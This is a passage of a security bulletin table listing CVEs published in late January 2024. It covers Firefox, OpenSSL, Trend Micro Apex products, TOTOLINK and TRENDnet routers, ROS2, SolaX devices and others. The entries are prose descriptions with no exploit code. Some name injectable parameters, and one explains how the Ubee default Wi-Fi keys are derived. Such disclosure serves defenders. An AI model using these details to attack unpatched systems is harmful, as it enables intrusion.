ministry_of_land_infrastructure_transport_and_tourism_japan — electronic_delivery_check_system_(doboku) | Electronic Delivery Check System (Doboku) Ver.18.1.0 and earlier, Electronic Delivery Check System (Dentsu) Ver.12.1.0 and earlier, Electronic Delivery Check System (Kikai) Ver.10.1.0 and earlier, and Electronic delivery item Inspection Support SystemVer.4.0.31 and earlier improperly restrict XML external entity references (XXE). By processing a specially crafted XML file, arbitrary files on the system may be read by an attacker. | 2024-01-24 | not yet calculated | CVE-2024-21765 [email protected] [email protected] [email protected] |
mozilla — firefox | An out of bounds write in ANGLE could have allowed an attacker to corrupt memory leading to a potentially exploitable crash. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7. | 2024-01-23 | not yet calculated | CVE-2024-0741 [email protected] [email protected] [email protected] [email protected] [email protected] |
mozilla — firefox | It was possible for certain browser prompts and dialogs to be activated or dismissed unintentionally by the user due to an incorrect timestamp used to prevent input after page load. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7. | 2024-01-23 | not yet calculated | CVE-2024-0742 [email protected] [email protected] [email protected] [email protected] [email protected] |
mozilla — firefox | An unchecked return value in TLS handshake code could have caused a potentially exploitable crash. This vulnerability affects Firefox < 122. | 2024-01-23 | not yet calculated | CVE-2024-0743 [email protected] [email protected] |
mozilla — firefox | In some circumstances, JIT compiled code could have dereferenced a wild pointer value. This could have led to an exploitable crash. This vulnerability affects Firefox < 122. | 2024-01-23 | not yet calculated | CVE-2024-0744 [email protected] [email protected] |
mozilla — firefox | The WebAudio `OscillatorNode` object was susceptible to a stack buffer overflow. This could have led to a potentially exploitable crash. This vulnerability affects Firefox < 122. | 2024-01-23 | not yet calculated | CVE-2024-0745 [email protected] [email protected] |
mozilla — firefox | A Linux user opening the print preview dialog could have caused the browser to crash. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7. | 2024-01-23 | not yet calculated | CVE-2024-0746 [email protected] [email protected] [email protected] [email protected] [email protected] |
mozilla — firefox | When a parent page loaded a child in an iframe with `unsafe-inline`, the parent Content Security Policy could have overridden the child Content Security Policy. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7. | 2024-01-23 | not yet calculated | CVE-2024-0747 [email protected] [email protected] [email protected] [email protected] [email protected] |
mozilla — firefox | A compromised content process could have updated the document URI. This could have allowed an attacker to set an arbitrary URI in the address bar or history. This vulnerability affects Firefox < 122. | 2024-01-23 | not yet calculated | CVE-2024-0748 [email protected] [email protected] |
mozilla — firefox | A phishing site could have repurposed an `about:` dialog to show phishing content with an incorrect origin in the address bar. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7. | 2024-01-23 | not yet calculated | CVE-2024-0749 [email protected] [email protected] [email protected] [email protected] [email protected] |
mozilla — firefox | A bug in popup notifications delay calculation could have made it possible for an attacker to trick a user into granting permissions. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7. | 2024-01-23 | not yet calculated | CVE-2024-0750 [email protected] [email protected] [email protected] [email protected] [email protected] |
mozilla — firefox | A malicious devtools extension could have been used to escalate privileges. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7. | 2024-01-23 | not yet calculated | CVE-2024-0751 [email protected] [email protected] [email protected] [email protected] [email protected] |
mozilla — firefox | A use-after-free crash could have occurred on macOS if a Firefox update were being applied on a very busy system. This could have resulted in an exploitable crash. This vulnerability affects Firefox < 122. | 2024-01-23 | not yet calculated | CVE-2024-0752 [email protected] [email protected] |
mozilla — firefox | In specific HSTS configurations an attacker could have bypassed HSTS on a subdomain. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7. | 2024-01-23 | not yet calculated | CVE-2024-0753 [email protected] [email protected] [email protected] [email protected] [email protected] |
mozilla — firefox | Some WASM source files could have caused a crash when loaded in devtools. This vulnerability affects Firefox < 122. | 2024-01-23 | not yet calculated | CVE-2024-0754 [email protected] [email protected] |
mozilla — firefox | Memory safety bugs present in Firefox 121, Firefox ESR 115.6, and Thunderbird 115.6. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7. | 2024-01-23 | not yet calculated | CVE-2024-0755 [email protected] [email protected] [email protected] [email protected] [email protected] |
mozilla — focus_for_ios | Using a javascript: URI with a setTimeout race condition, an attacker can execute unauthorized scripts on top origin sites in urlbar. This bypasses security measures, potentially leading to arbitrary code execution or unauthorized actions within the user’s loaded webpage. This vulnerability affects Focus for iOS < 122. | 2024-01-22 | not yet calculated | CVE-2024-0605 [email protected] [email protected] |
mozilla — focus_for_ios | An attacker could execute unauthorized script on a legitimate site through UXSS using window.open() by opening a javascript URI leading to unauthorized actions within the user’s loaded webpage. This vulnerability affects Focus for iOS < 122. | 2024-01-22 | not yet calculated | CVE-2024-0606 [email protected] [email protected] |
multisigwallet– 0xf0c99 | MultiSigWallet 0xF0C99 was discovered to contain a reentrancy vulnerability via the function executeTransaction. | 2024-01-19 | not yet calculated | CVE-2023-47033 [email protected] [email protected] |
mygakuya– mini-app_line | An issue in myGAKUYA mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token. | 2024-01-26 | not yet calculated | CVE-2023-48127 [email protected] |
myq — print_server | MyQ Print Server before 8.2 patch 43 allows Unauthenticated Remote Code Execution. | 2024-01-23 | not yet calculated | CVE-2024-22076 [email protected] [email protected] |
nagios — nagios cross-platform_agent_(ncpa) | DOM-based Cross Site Scripting (XSS vulnerability in ‘Tail Event Logs’ functionality in Nagios Nagios Cross-Platform Agent (NCPA) before 2.4.0 allows attackers to run arbitrary code via the name element when filtering for a log. | 2024-01-24 | not yet calculated | CVE-2021-43584 [email protected] |
netsis_systems — mw5360 | NETIS SYSTEMS MW5360 V1.0.1.3031 was discovered to contain a command injection vulnerability via the password parameter on the login page. | 2024-01-25 | not yet calculated | CVE-2024-22729 [email protected] |
opennds — opennds | An issue was discovered in OpenNDS before 10.1.3. It fails to sanitize the network interface name entry in the configuration file, allowing attackers that have direct or indirect access to this file to execute arbitrary OS commands. | 2024-01-26 | not yet calculated | CVE-2023-38317 [email protected] [email protected] [email protected] [email protected] |
opennds — opennds | An issue was discovered in OpenNDS before 10.1.3. It fails to sanitize the gateway FQDN entry in the configuration file, allowing attackers that have direct or indirect access to this file to execute arbitrary OS commands. | 2024-01-26 | not yet calculated | CVE-2023-38318 [email protected] [email protected] [email protected] [email protected] |
opennds — opennds | An issue was discovered in OpenNDS before 10.1.3. It fails to sanitize the FAS key entry in the configuration file, allowing attackers that have direct or indirect access to this file to execute arbitrary OS commands. | 2024-01-26 | not yet calculated | CVE-2023-38319 [email protected] [email protected] [email protected] [email protected] |
opennds — opennds | An issue was discovered in OpenNDS before 10.1.3. It fails to sanitize the status path script entry in the configuration file, allowing attackers that have direct or indirect access to this file to execute arbitrary OS commands. | 2024-01-26 | not yet calculated | CVE-2023-38323 [email protected] [email protected] [email protected] [email protected] |
openssl — openssl | Issue summary: Processing a maliciously formatted PKCS12 file may lead OpenSSL to crash leading to a potential Denial of Service attack Impact summary: Applications loading files in the PKCS12 format from untrusted sources might terminate abruptly. A file in PKCS12 format can contain certificates and keys and may come from an untrusted source. The PKCS12 specification allows certain fields to be NULL, but OpenSSL does not correctly check for this case. This can lead to a NULL pointer dereference that results in OpenSSL crashing. If an application processes PKCS12 files from an untrusted source using the OpenSSL APIs then that application will be vulnerable to this issue. OpenSSL APIs that are vulnerable to this are: PKCS12_parse(), PKCS12_unpack_p7data(), PKCS12_unpack_p7encdata(), PKCS12_unpack_authsafes() and PKCS12_newpass(). We have also fixed a similar issue in SMIME_write_PKCS7(). However since this function is related to writing data we do not consider it security significant. The FIPS modules in 3.2, 3.1 and 3.0 are not affected by this issue. | 2024-01-26 | not yet calculated | CVE-2024-0727 [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] |
othanc — othanc | Orthanc versions before 1.12.2 are affected by a reflected cross-site scripting (XSS) vulnerability. The vulnerability was present in the server’s error reporting. | 2024-01-24 | not yet calculated | CVE-2024-22725 [email protected] [email protected] |
paddle — paddle | Code Injection in paddlepaddle/paddle | 2024-01-20 | not yet calculated | CVE-2024-0521 [email protected] |
pandasai — pandasai | GenerateSDFPipeline in synthetic_dataframe in PandasAI (aka pandas-ai) through 1.5.17 allows attackers to trigger the generation of arbitrary Python code that is executed by SDFCodeExecutor. An attacker can create a dataframe that provides an English language specification of this Python code. NOTE: the vendor previously attempted to restrict code execution in response to a separate issue, CVE-2023-39660. | 2024-01-22 | not yet calculated | CVE-2024-23752 [email protected] |
plone — docker_official_image | An issue in Plone Docker Official Image 5.2.13 (5221) open-source software allows for remote code execution via improper validation of input by the HOST headers. | 2024-01-25 | not yet calculated | CVE-2024-23055 [email protected] [email protected] [email protected] |
pluXml — pluxml | PluXml Blog v5.8.9 was discovered to contain a remote code execution (RCE) vulnerability in the Static Pages feature. This vulnerability is exploited via injecting a crafted payload into the Content field. | 2024-01-25 | not yet calculated | CVE-2024-22636 [email protected] |
poco — utf32encoding.cpp | UTF32Encoding.cpp in POCO has a Poco::UTF32Encoding integer overflow and resultant stack buffer overflow because Poco::UTF32Encoding::convert() and Poco::UTF32::queryConvert() may return a negative integer if a UTF-32 byte sequence evaluates to a value of 0x80000000 or higher. This is fixed in 1.11.8p2, 1.12.5p2, and 1.13.0. | 2024-01-27 | not yet calculated | CVE-2023-52389 [email protected] [email protected] [email protected] |
pops! — rebel | The POPS! Rebel application 5.0 for Android, in POPS! Rebel Bluetooth Glucose Monitoring System, sends unencrypted glucose measurements over BLE. | 2024-01-20 | not yet calculated | CVE-2023-46447 [email protected] [email protected] [email protected] |
processwire — processwire | An issue found in Processwire 3.0.210 allows attackers to execute arbitrary code and install a reverse shell via the download_zip_url parameter when installing a new module. | 2024-01-24 | not yet calculated | CVE-2023-24676 [email protected] |
projectworlds — vistor_management_systemin_php | An issue in Projectworlds Vistor Management Systemin PHP v.1.0 allows a remote attacker to escalate privileges via a crafted script to the login page in the POST/index.php | 2024-01-25 | not yet calculated | CVE-2024-22922 [email protected] [email protected] [email protected] |
provectus — kafka-ui | An issue discovered in provectus kafka-ui 0.4.0 through 0.7.1 allows remote attackers to execute arbitrary code via the q parameter of /api/clusters/local/topics/{topic}/messages. | 2024-01-25 | not yet calculated | CVE-2023-52251 [email protected] |
quest_analytics_llc — iqcrm | SQL Injection vulnerability in Quest Analytics LLC IQCRM v.2023.9.5 allows a remote attacker to execute arbitrary code via a crafted request to the Common.svc WSDL page. | 2024-01-22 | not yet calculated | CVE-2023-48118 [email protected] [email protected] [email protected] |
redis — raft_master | Redis raft master-1b8bd86 to master-7b46079 was discovered to contain an ODR violation via the component hiredisAllocFns at /opt/fs/redisraft/deps/hiredis/alloc.c. | 2024-01-23 | not yet calculated | CVE-2023-31654 [email protected] [email protected] |
regify — regipay_ client | An issue was discovered in Regify Regipay Client for Windows version 4.5.1.0 allows DLL hijacking: a user can trigger the execution of arbitrary code every time the product is executed. | 2024-01-24 | not yet calculated | CVE-2023-51711 [email protected] |
ros2 — foxy_fitzroy | Buffer Overflow vulnerability in ROS2 Foxy Fitzroy ROS_VERSION=2 and ROS_PYTHON_VERSION=3 allows attackers to run arbitrary code or cause a denial of service via improper handling of arrays or strings. | 2024-01-23 | not yet calculated | CVE-2023-51199 [email protected] |
ros2 — foxy_fitzroy | An issue in the default configurations of ROS2 Foxy Fitzroy ROS_VERSION=2 and ROS_PYTHON_VERSION=3 allows unauthenticated attackers to authenticate using default credentials. | 2024-01-23 | not yet calculated | CVE-2023-51200 [email protected] |
ros2 — foxy_fitzroy | Cleartext Transmission issue in ROS2 (Robot Operating System 2) Foxy Fitzroy, with ROS_VERSION=2 and ROS_PYTHON_VERSION=3 allows attackers to access sensitive information via a man-in-the-middle attack. | 2024-01-23 | not yet calculated | CVE-2023-51201 [email protected] |
ros2 — foxy_fitzroy | An Arbitrary File Upload vulnerability in ROS2 Foxy Fitzroy ROS_VERSION=2 and ROS_PYTHON_VERSION=3 allows attackers to run arbitrary code and cause other impacts via upload of crafted file. | 2024-01-23 | not yet calculated | CVE-2023-51208 [email protected] |
rptc — 0x3b08c | RPTC 0x3b08c was discovered to not conduct status checks on the parameter tradingOpen. This vulnerability can allow attackers to conduct unauthorized transfer operations. | 2024-01-19 | not yet calculated | CVE-2023-47035 [email protected] [email protected] |
shelly — trv_ 20220811-152343 | Missing Integrity Check in Shelly TRV 20220811-152343/v2.1.8@5afc928c allows malicious users to create a backdoor by redirecting the device to an attacker-controlled machine which serves the manipulated firmware file. The device is updated with the manipulated firmware. | 2024-01-23 | not yet calculated | CVE-2023-42143 [email protected] |
shelly — trv_20220811-152343 | Cleartext Transmission during initial setup in Shelly TRV 20220811-15234 v.2.1.8 allows a local attacker to obtain the Wi-Fi password. | 2024-01-23 | not yet calculated | CVE-2023-42144 [email protected] |
solaxpower — pocket_wifi | An issue was discovered in SolaX Pocket WiFi 3 through 3.001.02. The device provides a WiFi access point for initial configuration. The WiFi network provided has no network authentication (such as an encryption key) and persists permanently, including after enrollment and setup is complete. The WiFi network serves a web-based configuration utility, as well as an unauthenticated ModBus protocol interface. | 2024-01-23 | not yet calculated | CVE-2023-35835 [email protected] [email protected] [email protected] [email protected] |
solaxpower — pocket_wifi | An issue was discovered in SolaX Pocket WiFi 3 through 3.001.02. An attacker within RF range can obtain a cleartext copy of the network configuration of the device, including the Wi-Fi PSK, during device setup and reconfiguration. Upon success, the attacker is able to further infiltrate the target’s Wi-Fi networks. | 2024-01-23 | not yet calculated | CVE-2023-35836 [email protected] [email protected] [email protected] [email protected] |
solaxpower — pocket_wifi | An issue was discovered in SolaX Pocket WiFi 3 through 3.001.02. Authentication for web interface is completed via an unauthenticated WiFi AP. The administrative password for the web interface has a default password, equal to the registration ID of the device. This same registration ID is used as the WiFi SSID name. No routine is in place to force a change to this password on first use or bring its default state to the attention of the user. Once authenticated, an attacker can reconfigure the device or upload new firmware, both of which can lead to Denial of Service, code execution, or Escalation of Privileges. | 2024-01-23 | not yet calculated | CVE-2023-35837 [email protected] [email protected] [email protected] [email protected] |
splicecom — ipcs | A lack of SSL certificate validation in Splicecom iPCS (iOS App) v1.3.4, iPCS2 (iOS App) v2.8 and before, and iPCS (Android App) v1.8.5 and before allows attackers to eavesdrop on communications via a man-in-the-middle attack. | 2024-01-25 | not yet calculated | CVE-2023-33757 [email protected] |
spliceocm — maximiser_soft_pbx | Splicecom Maximiser Soft PBX v1.5 and before was discovered to contain a cross-site scripting (XSS) vulnerability via the CLIENT_NAME and DEVICE_GUID fields in the login component. | 2024-01-25 | not yet calculated | CVE-2023-33758 [email protected] |
spliceocm — maximiser_soft_pbx | SpliceCom Maximiser Soft PBX v1.5 and before does not restrict excessive authentication attempts, allowing attackers to bypass authentication via a brute force attack. | 2024-01-25 | not yet calculated | CVE-2023-33759 [email protected] |
spliceocm — maximiser_soft_pbx | SpliceCom Maximiser Soft PBX v1.5 and before was discovered to utilize a default SSL certificate. This issue can allow attackers to eavesdrop on communications via a man-in-the-middle attack. | 2024-01-25 | not yet calculated | CVE-2023-33760 [email protected] |
spoon_radio_japan_inc. — android_spoon_application | Android Spoon application version 7.11.1 to 8.6.0 uses hard-coded credentials, which may allow a local attacker to retrieve the hard-coded API key when the application binary is reverse-engineered. This API key may be used for unexpected access of the associated service. | 2024-01-24 | not yet calculated | CVE-2024-23453 [email protected] [email protected] [email protected] |
sunlight — sunlightcms | Cross Site Scripting (XSS) vulnerability in Sunlight CMS v.8.0.1, allows remote authenticated attackers to execute arbitrary code and escalate privileges via a crafted script to the Content text editor component. | 2024-01-27 | not yet calculated | CVE-2023-48201 [email protected] |
sunlight — sunlightcms | Cross-Site Scripting (XSS) vulnerability in Sunlight CMS 8.0.1 allows an authenticated low-privileged user to escalate privileges via a crafted SVG file in the File Manager component. | 2024-01-27 | not yet calculated | CVE-2023-48202 [email protected] |
totolink — a3700r | TOTOLINK A3700R_V9.1.2u.6165_20211012 has a stack overflow vulnerability via setParentalRules | 2024-01-23 | not yet calculated | CVE-2024-22662 [email protected] |
totolink — a3700r | TOTOLINK_A3700R_V9.1.2u.6165_20211012has a command Injection vulnerability via setOpModeCfg | 2024-01-23 | not yet calculated | CVE-2024-22663 [email protected] |
totolink — x2000r | TOTOLINK X2000R_V2 V2.0.0-B20230727.10434 has a command injection vulnerability in the sub_449040 (handle function of formUploadFile) of /bin/boa. | 2024-01-25 | not yet calculated | CVE-2024-22529 [email protected] |
totolink — x6000r | An issue discovered in TOTOLINK X6000R v9.4.0cu.852_B20230719 allows attackers to run arbitrary commands via the sub_415AA4 function. | 2024-01-24 | not yet calculated | CVE-2023-52039 [email protected] |
totolink — x6000r | An issue discovered in TOTOLINK X6000R v9.4.0cu.852_B20230719 allows attackers to run arbitrary commands via the sub_41284C function. | 2024-01-24 | not yet calculated | CVE-2023-52040 [email protected] |
totolink — a3700r | TOTOLINK_A3700R_V9.1.2u.6165_20211012has a stack overflow vulnerability via setLanguageCfg | 2024-01-23 | not yet calculated | CVE-2024-22660 [email protected] |
treandnet –tew-824dru | TRENDnet TEW-824DRU version 1.04b01 is vulnerable to Command Injection via the system.ntp.server in the sub_420AE0() function. | 2024-01-26 | not yet calculated | CVE-2024-22545 [email protected] |
treandnet –tew-824dru | An arbitrary file upload vulnerability in the component /alsdemo/ss/mediam.cgi of ShopSite v14.0 allows attackers to execute arbitrary code via uploading a crafted SVG file. | 2024-01-26 | not yet calculated | CVE-2024-22550 [email protected] |
trend_micro_inc. — trend_micro_apex_one | An anti-spyware engine link following vulnerability in Trend Micro Apex One could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. | 2024-01-23 | not yet calculated | CVE-2023-52091 [email protected] [email protected] |
trend_micro_inc. — trend_micro_apex_one | A security agent link following vulnerability in Trend Micro Apex One could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. | 2024-01-23 | not yet calculated | CVE-2023-52092 [email protected] [email protected] |
trend_micro_inc. — trend_micro_apex_one | An exposed dangerous function vulnerability in the Trend Micro Apex One agent could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. | 2024-01-23 | not yet calculated | CVE-2023-52093 [email protected] [email protected] |
trend_micro,_inc. — trend_micro_apex_one | An updater link following vulnerability in the Trend Micro Apex One agent could allow a local attacker to abuse the updater to delete an arbitrary folder, leading for a local privilege escalation on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. | 2024-01-23 | not yet calculated | CVE-2023-52094 [email protected] [email protected] |
trend_micro_inc. — trend_micro_apex_central | An unrestricted file upload vulnerability in Trend Micro Apex Central could allow a remote attacker to create arbitrary files on affected installations. Please note: although authentication is required to exploit this vulnerability, this vulnerability could be exploited when the attacker has any valid set of credentials. Also, this vulnerability could be potentially used in combination with another vulnerability to execute arbitrary code. | 2024-01-23 | not yet calculated | CVE-2023-52324 [email protected] [email protected] |
trend_micro_inc. — trend_micro_apex_central | A post-authenticated server-side request forgery (SSRF) vulnerability in Trend Micro Apex Central 2019 (lower than build 6481) could allow an attacker to interact with internal or local services directly. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. This is a similar, but not identical vulnerability as CVE-2023-38625 through CVE-2023-38627. | 2024-01-23 | not yet calculated | CVE-2023-38624 [email protected] [email protected] |
trend_micro_inc. — trend_micro_apex_central | A post-authenticated server-side request forgery (SSRF) vulnerability in Trend Micro Apex Central 2019 (lower than build 6481) could allow an attacker to interact with internal or local services directly. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. This is a similar, but not identical vulnerability as CVE-2023-38624. | 2024-01-23 | not yet calculated | CVE-2023-38625 [email protected] [email protected] |
trend_micro_inc. — trend_micro_apex_central | A post-authenticated server-side request forgery (SSRF) vulnerability in Trend Micro Apex Central 2019 (lower than build 6481) could allow an attacker to interact with internal or local services directly. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. This is a similar, but not identical vulnerability as CVE-2023-38625. | 2024-01-23 | not yet calculated | CVE-2023-38626 [email protected] [email protected] |
trend_micro_inc. — trend_micro_apex_central | A post-authenticated server-side request forgery (SSRF) vulnerability in Trend Micro Apex Central 2019 (lower than build 6481) could allow an attacker to interact with internal or local services directly. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. This is a similar, but not identical vulnerability as CVE-2023-38626. | 2024-01-23 | not yet calculated | CVE-2023-38627 [email protected] [email protected] |
trend_micro_inc. — trend_micro_apex_central | A local file inclusion vulnerability in one of Trend Micro Apex Central’s widgets could allow a remote attacker to execute arbitrary code on affected installations. Please note: this vulnerability must be used in conjunction with another one to exploit an affected system. In addition, an attacker must first obtain a valid set of credentials on target system in order to exploit this vulnerability. | 2024-01-23 | not yet calculated | CVE-2023-52325 [email protected] [email protected] |
trend_micro_inc. — trend_micro_apex_central | Certain dashboard widgets on Trend Micro Apex Central (on-premise) are vulnerable to cross-site scripting (XSS) attacks that may allow an attacker to achieve remote code execution on affected servers. Please note this vulnerability is similar, but not identical to CVE-2023-52327. | 2024-01-23 | not yet calculated | CVE-2023-52326 [email protected] [email protected] |
trend_micro_inc. — trend_micro_apex_central | Certain dashboard widgets on Trend Micro Apex Central (on-premise) are vulnerable to cross-site scripting (XSS) attacks that may allow an attacker to achieve remote code execution on affected servers. Please note this vulnerability is similar, but not identical to CVE-2023-52328. | 2024-01-23 | not yet calculated | CVE-2023-52327 [email protected] [email protected] |
trend_micro_inc. — trend_micro_apex_central | Certain dashboard widgets on Trend Micro Apex Central (on-premise) are vulnerable to cross-site scripting (XSS) attacks that may allow an attacker to achieve remote code execution on affected servers. Please note this vulnerability is similar, but not identical to CVE-2023-52329. | 2024-01-23 | not yet calculated | CVE-2023-52328 [email protected] [email protected] |
trend_micro_inc. — trend_micro_apex_central | Certain dashboard widgets on Trend Micro Apex Central (on-premise) are vulnerable to cross-site scripting (XSS) attacks that may allow an attacker to achieve remote code execution on affected servers. Please note this vulnerability is similar, but not identical to CVE-2023-52326. | 2024-01-23 | not yet calculated | CVE-2023-52329 [email protected] [email protected] |
trend_micro_inc. — trend_micro_apex_central | A cross-site scripting vulnerability in Trend Micro Apex Central could allow a remote attacker to execute arbitrary code on affected installations of Trend Micro Apex Central. Please note: user interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. | 2024-01-23 | not yet calculated | CVE-2023-52330 [email protected] [email protected] |
trend_micro_inc. — trend_micro_apex_central | A post-authenticated server-side request forgery (SSRF) vulnerability in Trend Micro Apex Central could allow an attacker to interact with internal or local services directly. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. | 2024-01-23 | not yet calculated | CVE-2023-52331 [email protected] [email protected] |
trend_micro_inc. — trend_micro_apex_one | An agent link vulnerability in the Trend Micro Apex One security agent could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. | 2024-01-23 | not yet calculated | CVE-2023-47192 [email protected] [email protected] |
trend_micro_inc. — trend_micro_apex_one | An origin validation vulnerability in the Trend Micro Apex One security agent could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. This vulnerability is similar to, but not identical to, CVE-2023-47194. | 2024-01-23 | not yet calculated | CVE-2023-47193 [email protected] [email protected] |
trend_micro_inc. — trend_micro_apex_one | An origin validation vulnerability in the Trend Micro Apex One security agent could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. This vulnerability is similar to, but not identical to, CVE-2023-47195. | 2024-01-23 | not yet calculated | CVE-2023-47194 [email protected] [email protected] |
trend_micro_inc. — trend_micro_apex_one | An origin validation vulnerability in the Trend Micro Apex One security agent could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. This vulnerability is similar to, but not identical to, CVE-2023-47196. | 2024-01-23 | not yet calculated | CVE-2023-47195 [email protected] [email protected] |
trend_micro_inc. — trend_micro_apex_one | An origin validation vulnerability in the Trend Micro Apex One security agent could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. This vulnerability is similar to, but not identical to, CVE-2023-47197. | 2024-01-23 | not yet calculated | CVE-2023-47196 [email protected] [email protected] |
trend_micro_inc. — trend_micro_apex_one | An origin validation vulnerability in the Trend Micro Apex One security agent could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. This vulnerability is similar to, but not identical to, CVE-2023-47198. | 2024-01-23 | not yet calculated | CVE-2023-47197 [email protected] [email protected] |
trend_micro_inc. — trend_micro_apex_one | An origin validation vulnerability in the Trend Micro Apex One security agent could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. This vulnerability is similar to, but not identical to, CVE-2023-47199. | 2024-01-23 | not yet calculated | CVE-2023-47198 [email protected] [email protected] |
trend_micro_inc. — trend_micro_apex_one | An origin validation vulnerability in the Trend Micro Apex One security agent could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. This vulnerability is similar to, but not identical to, CVE-2023-47193. | 2024-01-23 | not yet calculated | CVE-2023-47199 [email protected] [email protected] |
trend_micro_inc. — trend_micro_apex_one | A plug-in manager origin validation vulnerability in the Trend Micro Apex One security agent could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. This vulnerability is similar to, but not identical to, CVE-2023-47201. | 2024-01-23 | not yet calculated | CVE-2023-47200 [email protected] [email protected] |
trend_micro_inc. — trend_micro_apex_one | A plug-in manager origin validation vulnerability in the Trend Micro Apex One security agent could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. This vulnerability is similar to, but not identical to, CVE-2023-47200. | 2024-01-23 | not yet calculated | CVE-2023-47201 [email protected] [email protected] |
trend_micro_inc. — trend_micro_apex_one | A local file inclusion vulnerability on the Trend Micro Apex One management server could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. | 2024-01-23 | not yet calculated | CVE-2023-47202 [email protected] [email protected] |
trend_micro_inc. — trend_micro_apex_one | A security agent link following vulnerability in Trend Micro Apex One could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. | 2024-01-23 | not yet calculated | CVE-2023-52090 [email protected] [email protected] |
trend_micro_inc. — trend_micro_deep_security_agent | An improper access control vulnerability in Trend Micro Deep Security 20.0 and Trend Micro Cloud One – Endpoint and Workload Security Agent could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. | 2024-01-23 | not yet calculated | CVE-2023-52337 [email protected] [email protected] |
trend_micro_inc. — trend_micro_deep_security_agent | A link following vulnerability in the Trend Micro Deep Security 20.0 and Trend Micro Cloud One – Endpoint and Workload Security Agent could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. | 2024-01-23 | not yet calculated | CVE-2023-52338 [email protected] [email protected] |
trend_micro_inc. — trend_micro_mobile_security_for_enterprise | Reflected cross-site scripting (XSS) vulnerabilities in Trend Micro Mobile Security (Enterprise) could allow an exploit against an authenticated victim that visits a malicious link provided by an attacker. Please note, this vulnerability is similar to, but not identical to, CVE-2023-41177. | 2024-01-23 | not yet calculated | CVE-2023-41176 [email protected] [email protected] |
trend_micro_inc. — trend_micro_mobile_security_for_enterprise | Reflected cross-site scripting (XSS) vulnerabilities in Trend Micro Mobile Security (Enterprise) could allow an exploit against an authenticated victim that visits a malicious link provided by an attacker. Please note, this vulnerability is similar to, but not identical to, CVE-2023-41178. | 2024-01-23 | not yet calculated | CVE-2023-41177 [email protected] [email protected] |
trend_micro_inc. — trend_micro_mobile_security_for_enterprise | Reflected cross-site scripting (XSS) vulnerabilities in Trend Micro Mobile Security (Enterprise) could allow an exploit against an authenticated victim that visits a malicious link provided by an attacker. Please note, this vulnerability is similar to, but not identical to, CVE-2023-41176. | 2024-01-23 | not yet calculated | CVE-2023-41178 [email protected] [email protected] |
trendnet — tew-411brpplus | A command injection issue in TRENDnet TEW-411BRPplus v.2.07_eu that allows a local attacker to execute arbitrary code via the data1 parameter in the debug.cgi page. | 2024-01-25 | not yet calculated | CVE-2023-51833 [email protected] [email protected] |
ubee — ddw365_xcnddw365 | Ubee DDW365 XCNDDW365 devices have predictable default WPA2 PSKs that could lead to unauthorized remote access. A remote attacker (in proximity to a Wi-Fi network) can derive the default WPA2-PSK value by observing a beacon frame. A PSK is generated by using the first six characters of the SSID and the last six of the BSSID, decrementing the last digit. | 2024-01-21 | not yet calculated | CVE-2024-23726 [email protected] |
uniswapfrontrunbot — 0xdB94c | A vulnerability in UniswapFrontRunBot 0xdB94c allows attackers to cause financial losses via unspecified vectors. | 2024-01-19 | not yet calculated | CVE-2023-47034 [email protected] [email protected] |
